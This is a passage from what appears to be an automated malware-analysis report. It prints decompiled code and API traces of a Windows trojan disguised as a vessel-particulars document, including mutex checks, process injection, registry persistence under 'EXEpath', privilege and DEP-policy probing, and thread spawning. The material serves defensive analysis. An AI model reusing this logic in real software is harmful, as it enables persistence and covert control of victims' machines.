                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          							_t171 = E00401289(0x415940, __eflags, 9);
                                          							__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t170);
                                          							_t174 = E0040712F(); // executed
                                          							_t348 = _t348 + 0xc;
                                          							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t174,  &_v80,  *_t171);
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						}
                                          					}
                                          					__eflags = _v12 - _t338;
                                          					if(__eflags != 0) {
                                          						L34:
                                          						_t96 = E00401289(0x415940, __eflags, 0x28);
                                          						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          						_t97 = atoi(_t96);
                                          						__eflags = _t97 - 2;
                                          						 *0x415938 = _t97;
                                          						if(_t97 != 2) {
                                          							__eflags = _t97 - 1;
                                          							if(__eflags != 0) {
                                          								L39:
                                          								_t98 = E00401289(0x415940, __eflags, 0xf);
                                          								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          								 *0x415118 =  *_t98;
                                          								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                          								_t101 = E00401289(0x415940, __eflags, 0x31);
                                          								__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t101, 0x410668);
                                          								__eflags = _t101;
                                          								if(__eflags == 0) {
                                          									_t102 = E00401289(0x415940, __eflags, 0x31);
                                          									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          									_t103 = E00401289(0x415940, __eflags, 0x10);
                                          									__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t102);
                                          									_t106 = E0040712F();
                                          									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t106,  &_v80,  *_t103);
                                          									__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          									CreateDirectoryA(_t106, _t338);
                                          									_t109 =  &_v64;
                                          									L0040FC20();
                                          									_t110 =  &_v80;
                                          									L0040FC14();
                                          									_t351 = _t348 + 0x24;
                                          									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t110, _t110, _t109, _t109, 0x415720, 0x4108cc, E00401289(0x415940, __eflags, 0x11));
                                          									__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          								} else {
                                          									_t140 = E00401289(0x415940, __eflags, 0x11);
                                          									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          									_t141 = E00401289(0x415940, __eflags, 0x10);
                                          									__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t140);
                                          									_t144 = E0040712F();
                                          									_t351 = _t348 + 0xc;
                                          									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t144,  &_v80,  *_t141);
                                          								}
                                          								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          								_t112 =  *0x415118 - 0x31;
                                          								__eflags = _t112;
                                          								if(_t112 == 0) {
                                          									_t351 = _t351 - 0x10;
                                          									__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          									E00403774(0x4156c0,  &_v32);
                                          								} else {
                                          									__eflags = _t112 - 1;
                                          									if(__eflags == 0) {
                                          										_t351 = _t351 - 0x10;
                                          										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          										E004037D4(0x4156c0,  &_v32);
                                          									}
                                          								}
                                          								_t115 = E00401289(0x415940, __eflags, 0x14);
                                          								__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          								__eflags =  *_t115 - 1;
                                          								if(__eflags == 0) {
                                          									CreateThread(_t338, _t338, E0040E157, _t338, _t338, _t338);
                                          								}
                                          								_t116 = E00401289(0x415940, __eflags, 0x16);
                                          								__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          								__eflags =  *_t116 - 1;
                                          								if(__eflags == 0) {
                                          									CreateThread(_t338, _t338, E0040E157, 1, _t338, _t338);
                                          								}
                                          								_t117 = E00401289(0x415940, __eflags, 0x23);
                                          								__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          								__eflags =  *_t117 - 1;
                                          								if(__eflags == 0) {
                                          									_t129 = E00401289(0x415940, __eflags, 0x26);
                                          									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          									_t130 = E00401289(0x415940, __eflags, 0x25);
                                          									__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t129);
                                          									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040712F(),  &_v80,  *_t130);
                                          									__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          									CreateThread(_t338, _t338, E00401883, _t338, _t338, _t338);
                                          								}
                                          								_t118 = E00401289(0x415940, __eflags, 0x2b);
                                          								__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          								__eflags =  *_t118 - 1;
                                          								if(__eflags == 0) {
                                          									_t124 = E00401289(0x415940, __eflags, 0x2d);
                                          									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          									_t125 = atoi(_t124);
                                          									_t126 = E00401289(0x415940, __eflags, 0x2c);
                                          									__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          									 *_t126 =  *_t126 != 0;
                                          									E00405F6C(_t126 & 0xffffff00 |  *_t126 != 0x00000000, _t125);
                                          								}
                                          								__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(E0040E549( &_v80));
                                          								__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          								_t121 =  *0x415960;
                                          								__eflags = _t121 - _t338;
                                          								if(_t121 != _t338) {
                                          									 *_t121(_t338);
                                          								}
                                          								E00409E73();
                                          								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          								goto L57;
                                          							}
                                          							_push(_t338);
                                          							L38:
                                          							E0040FAED(_t324);
                                          							CreateThread(_t338, _t338, E0040F8BF, _t338, _t338, _t338);
                                          							goto L39;
                                          						}
                                          						_push(1);
                                          						goto L38;
                                          					} else {
                                          						_t147 = E00401289(0x415940, __eflags, 3);
                                          						__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          						__eflags =  *_t147;
                                          						if(__eflags == 0) {
                                          							_t329 = 0x4157d0;
                                          							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z("C:\\Users\\hardz\\Desktop\\MV OLYMPIC PROGRESS VSL PARTICULARS.exe");
                                          						} else {
                                          							_t160 = E00401289(0x415940, __eflags, 0x1e);
                                          							__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          							__eflags =  *_t160;
                                          							_t162 = E00401289(0x415940, __eflags, 0xc);
                                          							__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t160 & 0xffffff00 | __eflags != 0x00000000);
                                          							__eflags =  *_t162;
                                          							_t164 = E00401289(0x415940, __eflags, 0xa);
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t162 & 0xffffff00 | __eflags != 0x00000000);
                                          							_t165 = E00401289(0x415940, __eflags, 0x30);
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t164);
                                          							_t166 = E00401289(0x415940, __eflags, 9);
                                          							__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t165);
                                          							_push( *_t166); // executed
                                          							_t147 = E0040650D(_t166); // executed
                                          							_t348 = _t348 + 0x14;
                                          							_t329 = 0x4157d0;
                                          						}
                                          						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          						_t148 = E00408E4E(0x80000001, _t147, "EXEpath");
                                          						_t348 = _t348 + 0xc;
                                          						__eflags = _t148;
                                          						if(__eflags == 0) {
                                          							__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          							_t152 = _t148 + 1;
                                          							L0040FCCC();
                                          							_v16 = _t152;
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t152);
                                          							asm("repne scasb");
                                          							_t287 =  !(_t329 | 0xffffffff);
                                          							_t339 = _t152 - _t287;
                                          							_t288 = _t287 >> 2;
                                          							_t156 = memcpy(_t339 + _t288 + _t288, _t339, memcpy(_v16, _t339, _t288 << 2) & 0x00000003);
                                          							__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          							__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          							E0040FC2C(E004090D0(__eflags, 0x80000001, _t156 + 1, "EXEpath", _v16, _t156 + 1, _t156, _t156), _v16);
                                          							_t348 = _t348 + 0x38;
                                          							_t338 = 0;
                                          							__eflags = 0;
                                          						}
                                          						_t149 = E00401289(0x415940, __eflags, 0xd);
                                          						__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t149, "0");
                                          						__eflags = _t149;
                                          						if(__eflags == 0) {
                                          							goto L34;
                                          						} else {
                                          							_t150 = E00401289(0x415940, __eflags, 0xd);
                                          							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          							_t151 = E00407E0B(_t150);
                                          							_t348 = _t348 - 0x10 + 0x10;
                                          							__eflags = _t151 - 1;
                                          							if(__eflags != 0) {
                                          								goto L34;
                                          							}
                                          							_push(3);
                                          							goto L6;
                                          						}
                                          					}
                                          				} else {
                                          					_push(1);
                                          					L6:
                                          					_pop(_t338);
                                          					L57:
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					return _t338;
                                          				}
                                          			}
















































































                                          0x00407452
                                          0x00407452
                                          0x0040745f
                                          0x00407473
                                          0x00407482
                                          0x0040748c
                                          0x0040749c
                                          0x004074a4
                                          0x004074b8
                                          0x004074c1
                                          0x004074ca
                                          0x004074ce
                                          0x004074d3
                                          0x004074de
                                          0x004074e7
                                          0x004074f0
                                          0x004074f6
                                          0x00407503
                                          0x00407506
                                          0x0040750e
                                          0x00407516
                                          0x00407516
                                          0x00407527
                                          0x00407533
                                          0x00407538
                                          0x0040753b
                                          0x0040753d
                                          0x00407546
                                          0x00407552
                                          0x00407557
                                          0x00407557
                                          0x0040755e
                                          0x0040756b
                                          0x00407573
                                          0x0040757d
                                          0x0040758e
                                          0x00407598
                                          0x0040759d
                                          0x004075ad
                                          0x004075c6
                                          0x004075cb
                                          0x004075d6
                                          0x004075df
                                          0x004075e5
                                          0x004075ea
                                          0x004075ec
                                          0x004075f5
                                          0x004075ee
                                          0x004075ee
                                          0x004075ee
                                          0x004075fc
                                          0x00407602
                                          0x00407607
                                          0x00407609
                                          0x0040760d
                                          0x0040760d
                                          0x00407612
                                          0x00407615
                                          0x0040761b
                                          0x00407622
                                          0x00407628
                                          0x0040762b
                                          0x0040762d
                                          0x00407633
                                          0x00407635
                                          0x0040763b
                                          0x00407666
                                          0x00407672
                                          0x00407677
                                          0x0040767a
                                          0x0040767c
                                          0x0040767e
                                          0x0040767e
                                          0x0040763d
                                          0x00407645
                                          0x00407651
                                          0x00407653
                                          0x00407655
                                          0x00407655
                                          0x00407653
                                          0x0040763b
                                          0x00407633
                                          0x0040762b
                                          0x00407687
                                          0x0040768e
                                          0x00407694
                                          0x00407697
                                          0x00407699
                                          0x00407699
                                          0x004076a2
                                          0x004076a9
                                          0x004076b5
                                          0x004076bf
                                          0x004076c6
                                          0x004076cc
                                          0x004076d6
                                          0x004076db
                                          0x004076e2
                                          0x004076e8
                                          0x004076f2
                                          0x004076f7
                                          0x004076fe
                                          0x00407704
                                          0x0040770e
                                          0x00407713
                                          0x0040771a
                                          0x00407720
                                          0x0040772a
                                          0x0040772f
                                          0x00407736
                                          0x0040773c
                                          0x00407746
                                          0x0040774b
                                          0x00407752
                                          0x00407758
                                          0x0040775b
                                          0x00407761
                                          0x00407768
                                          0x00407775
                                          0x00407779
                                          0x0040777a
                                          0x00407780
                                          0x00407787
                                          0x00407792
                                          0x00407799
                                          0x004077a6
                                          0x004077ab
                                          0x004077b4
                                          0x004077bd
                                          0x004077bd
                                          0x0040777a
                                          0x004077c3
                                          0x004077c6
                                          0x0040795e
                                          0x00407962
                                          0x00407969
                                          0x00407970
                                          0x0040797c
                                          0x0040797f
                                          0x00407984
                                          0x0040798a
                                          0x0040798c
                                          0x004079a1
                                          0x004079a5
                                          0x004079ac
                                          0x004079b7
                                          0x004079c0
                                          0x004079cf
                                          0x004079d5
                                          0x004079dc
                                          0x004079df
                                          0x00407a29
                                          0x00407a30
                                          0x00407a3b
                                          0x00407a42
                                          0x00407a4f
                                          0x00407a5d
                                          0x00407a66
                                          0x00407a72
                                          0x00407a79
                                          0x00407a8e
                                          0x00407a97
                                          0x00407aa0
                                          0x00407aa4
                                          0x00407aa9
                                          0x00407ab0
                                          0x00407ab9
                                          0x004079e1
                                          0x004079e5
                                          0x004079ec
                                          0x004079f7
                                          0x004079fe
                                          0x00407a0b
                                          0x00407a10
                                          0x00407a17
                                          0x00407a1d
                                          0x00407ac2
                                          0x00407acf
                                          0x00407acf
                                          0x00407ad2
                                          0x00407af2
                                          0x00407afb
                                          0x00407b06
                                          0x00407ad4
                                          0x00407ad4
                                          0x00407ad5
                                          0x00407ad7
                                          0x00407ae0
                                          0x00407aeb
                                          0x00407aeb
                                          0x00407ad5
                                          0x00407b0f
                                          0x00407b16
                                          0x00407b1c
                                          0x00407b1f
                                          0x00407b2b
                                          0x00407b2b
                                          0x00407b31
                                          0x00407b38
                                          0x00407b3e
                                          0x00407b41
                                          0x00407b4e
                                          0x00407b4e
                                          0x00407b54
                                          0x00407b5b
                                          0x00407b61
                                          0x00407b64
                                          0x00407b6a
                                          0x00407b71
                                          0x00407b7c
                                          0x00407b83
                                          0x00407b9e
                                          0x00407ba7
                                          0x00407bb7
                                          0x00407bb7
                                          0x00407bbd
                                          0x00407bc4
                                          0x00407bca
                                          0x00407bcd
                                          0x00407bd3
                                          0x00407bda
                                          0x00407be1
                                          0x00407bed
                                          0x00407bf4
                                          0x00407bfd
                                          0x00407c01
                                          0x00407c07
                                          0x00407c18
                                          0x00407c21
                                          0x00407c27
                                          0x00407c2c
                                          0x00407c2e
                                          0x00407c31
                                          0x00407c31
                                          0x00407c33
                                          0x00407c3b
                                          0x00000000
                                          0x00407c3b
                                          0x0040798e
                                          0x0040798f
                                          0x0040798f
                                          0x0040799f
                                          0x00000000
                                          0x0040799f
                                          0x00407986
                                          0x00000000
                                          0x004077cc
                                          0x004077d0
                                          0x004077d7
                                          0x004077dd
                                          0x004077e0
                                          0x00407859
                                          0x00407865
                                          0x004077e2
                                          0x004077e6
                                          0x004077ed
                                          0x004077f3
                                          0x004077fe
                                          0x00407805
                                          0x0040780b
                                          0x00407816
                                          0x0040781d
                                          0x00407828
                                          0x0040782f
                                          0x0040783a
                                          0x00407841
                                          0x00407849
                                          0x0040784a
                                          0x0040784f
                                          0x00407852
                                          0x00407852
                                          0x00407875
                                          0x00407881
                                          0x00407886
                                          0x00407889
                                          0x0040788b
                                          0x00407893
                                          0x00407899
                                          0x0040789b
                                          0x004078a1
                                          0x004078a6
                                          0x004078b3
                                          0x004078b5
                                          0x004078bb
                                          0x004078c0
                                          0x004078ca
                                          0x004078d3
                                          0x004078dc
                                          0x004078e8
                                          0x004078fd
                                          0x00407911
                                          0x00407916
                                          0x00407919
                                          0x00407919
                                          0x00407919
                                          0x00407924
                                          0x0040792a
                                          0x00407931
                                          0x00407934
                                          0x00000000
                                          0x00407936
                                          0x0040793a
                                          0x00407945
                                          0x0040794b
                                          0x00407950
                                          0x00407953
                                          0x00407955
                                          0x00000000
                                          0x00000000
                                          0x00407957
                                          0x00000000
                                          0x00407957
                                          0x00407934
                                          0x00407590
                                          0x00407590
                                          0x00407592
                                          0x00407592
                                          0x00407c41
                                          0x00407c44
                                          0x00407c50
                                          0x00407c50

                                          APIs
                                            • Part of subcall function 00407C53: malloc.MSVCRT ref: 00407C76
                                            • Part of subcall function 00407C53: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00407CA2
                                            • Part of subcall function 00407C53: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407CAE
                                            • Part of subcall function 00407C53: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407CB7
                                            • Part of subcall function 00407C53: malloc.MSVCRT ref: 00407CC8
                                            • Part of subcall function 00407C53: free.MSVCRT(?,?,?,?,dt@,00000000), ref: 00407D13
                                            • Part of subcall function 00407C53: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407D21
                                            • Part of subcall function 00407C53: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407D2A
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000), ref: 00407473
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407482
                                            • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                            • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                            • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                            • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Software\,00000000,0000000E,004108CC,00000000), ref: 004074C1
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,0000000E,004108CC,00000000), ref: 004074CE
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,004108CC,00000000), ref: 004074DE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,004108CC,00000000), ref: 004074E7
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,004108CC,00000000), ref: 004074F0
                                          • OpenMutexA.KERNEL32 ref: 00407506
                                          • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,004108CC,00000000), ref: 00407516
                                            • Part of subcall function 00407D38: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00415978,00000000,00415940,0040759D,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D4B
                                            • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407D54
                                            • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D6F
                                            • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407D72
                                            • Part of subcall function 00407D38: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D83
                                            • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407D86
                                            • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DA0
                                            • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DA3
                                            • Part of subcall function 00407D38: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DB4
                                            • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DB7
                                            • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DC9
                                            • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DCC
                                            • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DD9
                                            • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DDC
                                            • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DED
                                            • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DF0
                                            • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DFD
                                            • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407E00
                                            • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001C,00415978,00000000,00415940,004075A2,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401013
                                            • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001D,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040103B
                                            • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001F,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401060
                                            • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000020,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401085
                                            • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000021,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010AA
                                            • Part of subcall function 00401000: CreateThread.KERNEL32 ref: 004010C0
                                            • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000022,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010D1
                                            • Part of subcall function 00401000: CreateThread.KERNEL32 ref: 004010E5
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,004108CC,00000000), ref: 00407527
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407546
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040756B
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407573
                                          • CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040757D
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407583
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,00000104,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004075AD
                                            • Part of subcall function 00408EF1: RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,80000002), ref: 00408F12
                                            • Part of subcall function 00408EF1: RegQueryValueExA.KERNELBASE(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                                            • Part of subcall function 00408EF1: RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                                            • Part of subcall function 00408EF1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004075D6
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004075DF
                                            • Part of subcall function 0040F0B5: GetCurrentProcess.KERNEL32(u@,?,?,004075EA), ref: 0040F0C6
                                            • Part of subcall function 0040F0B5: IsWow64Process.KERNEL32(00000000,?,?,004075EA), ref: 0040F0CD
